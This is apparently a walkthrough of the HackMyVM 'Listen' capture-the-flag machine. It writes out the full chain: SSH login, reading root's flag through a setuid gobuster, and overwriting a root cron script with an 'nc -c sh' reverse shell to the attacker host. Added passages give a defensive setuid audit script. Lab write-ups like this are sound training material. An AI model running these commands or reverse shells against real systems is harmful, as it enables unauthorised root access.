HackMyVM-Listen machine detailed walkthrough (WP)
城南花已开 Lv5

Information gathering

Service discovery

An easy machine made by ll104567 himself; since the final flag is in the HMV{xxxxxx} format,

I'll file it under the HackMyVM category for now.

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.145 08:00:27:25:83:90 (Unknown)
192.168.60.254 00:50:56:e0:55:bd (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.969 seconds (130.02 hosts/sec). 4 responded
export ip=192.168.60.145
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.145:22
Open 192.168.60.145:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-08 14:45 CST
Initiating ARP Ping Scan at 14:45
Scanning 192.168.60.145 [1 port]
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
ARP Ping Scan Timing: About 100.00% done; ETC: 14:45 (0:00:00 remaining)
Completed ARP Ping Scan at 14:45, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:45
Completed Parallel DNS resolution of 1 host. at 14:45, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:45
Scanning 192.168.60.145 [2 ports]
Discovered open port 80/tcp on 192.168.60.145
Discovered open port 22/tcp on 192.168.60.145
Completed SYN Stealth Scan at 14:45, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.60.145
Host is up, received arp-response (0.00049s latency).
Scanned at 2025-01-08 14:45:31 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:25:83:90 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

User privilege escalation

curl port 80

❯ curl $ip
<h1>welcome:welcome_again</h1>

These are most likely user credentials, so log in over SSH.

welcome's default shell is sh, which is awkward to work in,

so switch to bash.

❯ ssh welcome@$ip
The authenticity of host '192.168.60.145 (192.168.60.145)' can't be established.
ED25519 key fingerprint is SHA256:wjUcj6T6r6sq8a/m+aBJnDgmy0hOeMWF04F18Qfae3Q.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.145' (ED25519) to the list of known hosts.
welcome@192.168.60.145's password:
Linux listen 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Could not chdir to home directory /home/welcome: No such file or directory
$ bash
welcome@listen:/$

Upload linpeas.sh and let it run an automated scan.

welcome@listen:/$ cd /tmp/
welcome@listen:/tmp$ wget 192.168.60.100/linpeas.sh
--2025-01-08 01:53:33-- http://192.168.60.100/linpeas.sh
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 827739 (808K) [application/octet-stream]
Saving to: ‘linpeas.sh’

linpeas.sh 100%[=======================================================================>] 808.34K --.-KB/s in 0.02s

2025-01-08 01:53:33 (48.1 MB/s) - ‘linpeas.sh’ saved [827739/827739]

welcome@listen:/tmp$ chmod +x linpeas.sh

File read

gobuster is flagged in the SGID section; the listing actually shows both the setuid and setgid bits (-rwsr-sr-x) with root as owner, so the program runs with root's identity.

╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root shadow 31K Jul 27 2018 /usr/bin/expiry
-rwxr-sr-x 1 root ssh 315K Jan 31 2020 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 15K May 4 2018 /usr/bin/bsd-write
-rwsr-sr-x 1 root root 4.8M Feb 3 2019 /usr/bin/gobuster (Unknown SGID binary)
-rwxr-sr-x 1 root tty 35K Jan 10 2019 /usr/bin/wall
-rwxr-sr-x 1 root crontab 43K Oct 11 2019 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 71K Jul 27 2018 /usr/bin/chage
-rwxr-sr-x 1 root mail 19K Dec 3 2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root shadow 39K Feb 14 2019 /usr/sbin/unix_chkpwd
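As a defender-side check added here (not part of the original writeup), the script below audits a listing of setuid/setgid files, in the ls -l shape linpeas prints or find / -perm /6000 -type f -ls produces, against an allowlist of binaries expected to carry those bits on a Debian host. The allowlist and the sample listing are assumed/constructed for illustration; a real baseline should be taken from a clean install. Unexpected entries are reported with their owner and which bit they carry, so a root-owned setuid gobuster stands out immediately.

```shell
#!/bin/sh
# Added example, not from the original writeup: audit a listing of
# setuid/setgid files against an allowlist of expected binaries.
# Input lines look like: "-rwsr-sr-x 1 root root 4.8M Feb 3 2019 /usr/bin/gobuster"
# (paths containing spaces are not handled; the last field is taken as the path).

# Assumed baseline: paths that legitimately carry setuid/setgid on this host.
ALLOWLIST="/usr/bin/expiry /usr/bin/ssh-agent /usr/bin/bsd-write /usr/bin/wall \
/usr/bin/crontab /usr/bin/chage /usr/bin/dotlockfile /usr/sbin/unix_chkpwd"

# Constructed sample listing, same shape as the SGID section in the writeup.
SAMPLE_LISTING='-rwxr-sr-x 1 root shadow 31K Jul 27 2018 /usr/bin/expiry
-rwxr-sr-x 1 root ssh 315K Jan 31 2020 /usr/bin/ssh-agent
-rwsr-sr-x 1 root root 4.8M Feb 3 2019 /usr/bin/gobuster
-rwsr-xr-x 1 root root 52K Jan 10 2019 /usr/local/bin/backup'

# audit_setid LISTING : prints one line per entry that is not in ALLOWLIST:
#   <path> owner=<user> group=<group> bits=<suid|sgid|suid+sgid>
audit_setid() {
    printf '%s\n' "$1" | while read -r mode links owner group rest; do
        path=${rest##* }                       # last whitespace-separated field
        case " $ALLOWLIST " in
            *" $path "*) continue ;;           # expected on this host: skip
        esac
        bits=""
        # 4th mode character is the owner-execute slot: s/S means setuid
        case $mode in ???s*|???S*) bits="suid" ;; esac
        # 7th mode character is the group-execute slot: s/S means setgid
        case $mode in ??????s*|??????S*) bits="${bits:+$bits+}sgid" ;; esac
        [ -n "$bits" ] || continue             # no setid bit at all: ignore
        printf '%s owner=%s group=%s bits=%s\n' "$path" "$owner" "$group" "$bits"
    done
}

# Stand-alone run over the constructed listing.
audit_setid "$SAMPLE_LISTING"
```

On a live host, feed it the real listing instead of the sample, e.g. audit_setid "$(find / -perm /6000 -type f -exec ls -l {} + 2>/dev/null)", and compare the result against the package-managed baseline: a setuid copy of a network scanner, a compiler or an interpreter is never something the distribution ships.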

This reminded me of a machine I did earlier that used a similar approach:

point gobuster's -w wordlist option at the file we want to read and have it scan an HTTP server started on Kali; every line of the file is then requested as a path and shows up in the server log.

welcome@listen:/tmp$ /usr/bin/gobuster -u http://192.168.60.100:8000 -w /root/root.txt

=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://192.168.60.100:8000/
[+] Threads : 10
[+] Wordlist : /root/root.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2025/01/08 01:59:58 Starting gobuster
=====================================================
=====================================================
2025/01/08 01:59:58 Finished
=====================================================
welcome@listen:/tmp$
❯ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.60.145 - - [08/Jan/2025 15:00:00] "GET / HTTP/1.1" 200 -
192.168.60.145 - - [08/Jan/2025 15:00:00] code 404, message File not found
192.168.60.145 - - [08/Jan/2025 15:00:00] "GET /fd8e2be6-6ac3-46ca-bfe3-ac88e15b27ba HTTP/1.1" 404 -
192.168.60.145 - - [08/Jan/2025 15:00:00] code 404, message File not found
192.168.60.145 - - [08/Jan/2025 15:00:00] "GET /HMV%7Bjust_root_flag%7D HTTP/1.1" 404 -

The path in the GET request is URL-encoded; just decode it.

[image: URL-decoded flag]

That gives us the flag, and normally the exercise ends once the flag is submitted.

Root privilege escalation

But to truly own the machine we still need a root shell.

After some more enumeration, there is a hidden bash script .test.sh in the /opt directory.

welcome@listen:/opt$ ls -al
total 12
drwxr-xr-x 2 root root 4096 Jan 7 05:54 .
drwxr-xr-x 18 root root 4096 Oct 16 2020 ..
-rwx------ 1 root root 10 Jan 7 05:54 .test.sh

I upload pspy64 to the target to monitor processes.

It shows a cron job that executes .test.sh every minute.

welcome@listen:/tmp$ wget 192.168.60.100/pspy64
--2025-01-08 02:03:04-- http://192.168.60.100/pspy64
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64 100%[=======================================================================>] 2.96M --.-KB/s in 0.03s

2025-01-08 02:03:04 (94.2 MB/s) - ‘pspy64’ saved [3104768/3104768]

welcome@listen:/tmp$ chmod +x pspy64
2025/01/08 02:04:01 CMD: UID=0 PID=24807 | /usr/sbin/CRON -f
2025/01/08 02:04:01 CMD: UID=0 PID=24808 | /usr/sbin/CRON -f
2025/01/08 02:04:01 CMD: UID=0 PID=24809 | /bin/sh -c /bin/bash /opt/.test.sh

Here one can think of gobuster's -o option, which writes the scan results to a file of our choosing,

but I got stuck on how to construct a path or a command,

because gobuster automatically prepends a / to every hit it reports.

Then I remembered bash's list operators ;, && and ||, which decide whether a command runs.

Put simply, you enter several commands at once; && and || use the previous command's exit status $? to decide whether the following command runs.

The detailed explanation is pasted below.

[image: explanation of the ;, && and || operators]
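To make the operator semantics concrete, here is an added example (not from the original writeup) that runs a one-line script of the same shape as the gobuster output. Because gobuster prepends a slash, the left-hand side becomes /bin, which is a directory the shell cannot execute (exit status 126), so whatever follows || runs, while whatever follows && does not. A harmless echo stands in for the command, and the line is run with sh; bash, which the cron job on the box uses, applies the same list rules.

```shell
#!/bin/sh
# Added example, not from the original writeup: how "/bin||cmd" and
# "/bin&&cmd" behave when executed as a script. "/bin" is a directory, so
# running it fails with status 126; "||" then runs the right-hand side,
# "&&" skips it. echo is used in place of any real command.

# run_line LINE : write LINE into a temporary one-line script, run it with
# sh and print whatever it writes to stdout (errors are discarded)
run_line() {
    tmp=$(mktemp)
    printf '%s\n' "$1" > "$tmp"
    sh "$tmp" 2>/dev/null || true      # status is inspected by status_of_line
    rm -f "$tmp"
}

# status_of_line LINE : exit status the shell reports for the one-line script
status_of_line() {
    tmp=$(mktemp)
    printf '%s\n' "$1" > "$tmp"
    rc=0
    sh "$tmp" >/dev/null 2>&1 || rc=$?
    rm -f "$tmp"
    echo "$rc"
}

# Same pattern as the writeup, with echo in place of the real command:
run_line '/bin||echo fallback-ran'      # /bin fails  -> prints "fallback-ran"
run_line '/bin&&echo never-printed'     # /bin fails  -> prints nothing
run_line '/bin/true&&echo ran'          # true succeeds -> prints "ran"
status_of_line '/bin'                   # 126: found, but not executable
```

This is exactly why the leading slash gobuster adds does not spoil the trick: the failure of the bogus first word is what triggers the second. From a defender's view it also shows why a root cron job must never execute a file that an unprivileged path can write into, even indirectly through a setuid tool with an output option.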

So we create a directory with that name on Kali.

mkdir "bin||nc -c sh 192.168.60.100 4444"
❯ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
------------- separator -----------------------
welcome@listen:/tmp$ echo "bin||nc -c sh 192.168.60.100 4444">dir.txt
welcome@listen:/tmp$ /usr/bin/gobuster -u http://192.168.60.100:8000 -w /tmp/dir.txt

=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://192.168.60.100:8000/
[+] Threads : 10
[+] Wordlist : /tmp/dir.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2025/01/08 02:20:01 Starting gobuster
=====================================================
/bin||nc -c sh 192.168.60.100 4444 (Status: 301)
=====================================================
2025/01/08 02:20:01 Finished
=====================================================
welcome@listen:/tmp$

Good, it outputs what we want.

Add a few gobuster flags to filter out the noise and print only the important information.

welcome@listen:/tmp$ /usr/bin/gobuster -u http://192.168.60.100:8000 -w /tmp/dir.txt  -n -q
/bin||nc -c sh 192.168.60.100 4444

Finally add the -o option to write the output to /opt/.test.sh.

-n: don't print HTTP status codes. Use this to cut noise from the output and focus on the other important information.

-q: don't print the banner and other noise. Useful for trimming miscellaneous output so that only the scan results are shown.

welcome@listen:/tmp$ /usr/bin/gobuster -u http://192.168.60.100:8000 -w /tmp/dir.txt  -n -q -o /opt/.test.sh
/bin||nc -c sh 192.168.60.100 4444
welcome@listen:/tmp$ ls -al /opt/
total 12
drwxr-xr-x 2 root root 4096 Jan 7 05:54 .
drwxr-xr-x 18 root root 4096 Oct 16 2020 ..
-rwx------ 1 root root 35 Jan 8 02:22 .test.sh ## the file has been modified

You can see that pwncat-cs automatically runs its shell-stabilisation steps once it receives the shell.

2025/01/08 02:23:01 CMD: UID=0 PID=24919 | /usr/sbin/CRON -f
2025/01/08 02:23:01 CMD: UID=0 PID=24920 | /usr/sbin/CRON -f
2025/01/08 02:23:01 CMD: UID=0 PID=24921 | /bin/sh -c /bin/bash /opt/.test.sh
2025/01/08 02:23:01 CMD: UID=0 PID=24922 | /bin/bash /opt/.test.sh
2025/01/08 02:23:01 CMD: UID=0 PID=24923 | /bin/bash /opt/.test.sh
2025/01/08 02:23:01 CMD: UID=0 PID=24924 | sh -c sh
2025/01/08 02:23:01 CMD: UID=0 PID=24925 | sh
2025/01/08 02:23:01 CMD: UID=0 PID=24926 | sh
2025/01/08 02:23:01 CMD: UID=0 PID=24927 | sh
2025/01/08 02:23:01 CMD: UID=0 PID=24929 | sh
2025/01/08 02:23:01 CMD: UID=0 PID=24928 | sh
2025/01/08 02:23:01 CMD: UID=0 PID=24930 | sh
2025/01/08 02:23:01 CMD: UID=0 PID=24931 | sh
2025/01/08 02:23:01 CMD: UID=0 PID=24932 | sh
2025/01/08 02:23:02 CMD: UID=0 PID=24933 | sh
2025/01/08 02:23:02 CMD: UID=0 PID=24934 | sh
2025/01/08 02:23:02 CMD: UID=0 PID=24936 | /usr/bin/bash
2025/01/08 02:23:02 CMD: UID=0 PID=24935 | /usr/bin/bash
2025/01/08 02:23:02 CMD: UID=0 PID=24937 | /usr/bin/bash
2025/01/08 02:23:02 CMD: UID=0 PID=24938 | /usr/bin/bash
2025/01/08 02:23:02 CMD: UID=0 PID=24939 | /usr/bin/bash
2025/01/08 02:23:02 CMD: UID=0 PID=24940 | /usr/bin/bash
2025/01/08 02:23:02 CMD: UID=0 PID=24941 | /usr/bin/bash
2025/01/08 02:23:02 CMD: UID=0 PID=24942 | /usr/bin/bash
2025/01/08 02:23:02 CMD: UID=0 PID=24943 | /usr/bin/bash
2025/01/08 02:23:02 CMD: UID=0 PID=24944 | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0 PID=24945 | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0 PID=24946 | /usr/bin/script -qc /usr/bin/bash /dev/null
2025/01/08 02:23:03 CMD: UID=0 PID=24947 | sh -c /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0 PID=24948 | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0 PID=24949 | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0 PID=24950 | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0 PID=24952 | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0 PID=24951 | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0 PID=24953 | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0 PID=24954 | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0 PID=24955 | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0 PID=24956 | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0 PID=24957 | /usr/bin/bash

Listen on the port on Kali and we get the shell.

❯ pwncat-cs -lp 4444
[15:19:10] Welcome to pwncat 🐈! __main__.py:164
[15:23:03] received connection from 192.168.60.145:58318 bind.py:84
[15:23:03] 0.0.0.0:4444: normalizing shell path manager.py:957
0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:957
[15:23:04] 192.168.60.145:58318: registered new host w/ db manager.py:957
(local) pwncat$
(remote) root@listen:/root# id
uid=0(root) gid=0(root) groups=0(root)
(remote) root@listen:/root# cat /root/root.txt
HMV{just_root_flag}
(remote) root@listen:/root# cat /root/user.txt
HMV{just_user_flag}

Besides the || trick, another option is to write the nc command into a file and then write that file's path into .test.sh.

welcome@listen:/tmp$ echo 'nc -c sh 192.168.60.100 4444'>exp
welcome@listen:/tmp$ chmod +x exp ## grant execute permission
welcome@listen:/tmp$ echo 'tmp/exp'>dir.txt ## rebuild the wordlist
--------------- separator --------------
mkdir -p tmp/exp
❯ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Exploit it.

welcome@listen:/tmp$ ls -al /opt/
total 12
drwxr-xr-x 2 root root 4096 Jan 7 05:54 .
drwxr-xr-x 18 root root 4096 Oct 16 2020 ..
-rwx------ 1 root root 35 Jan 8 02:24 .test.sh
welcome@listen:/tmp$ /usr/bin/gobuster -u http://192.168.60.100:8000 -w /tmp/dir.txt -n -q -o /opt/.test.sh
/tmp/exp
welcome@listen:/tmp$ ls -al /opt/
total 12
drwxr-xr-x 2 root root 4096 Jan 7 05:54 .
drwxr-xr-x 18 root root 4096 Oct 16 2020 ..
-rwx------ 1 root root 9 Jan 8 02:30 .test.sh

The /opt/.test.sh script then tries to execute the /tmp/exp file.

This works much like a link: you can edit exp freely, and there are plenty of reverse-shell options to choose from.

Online - Reverse Shell Generator
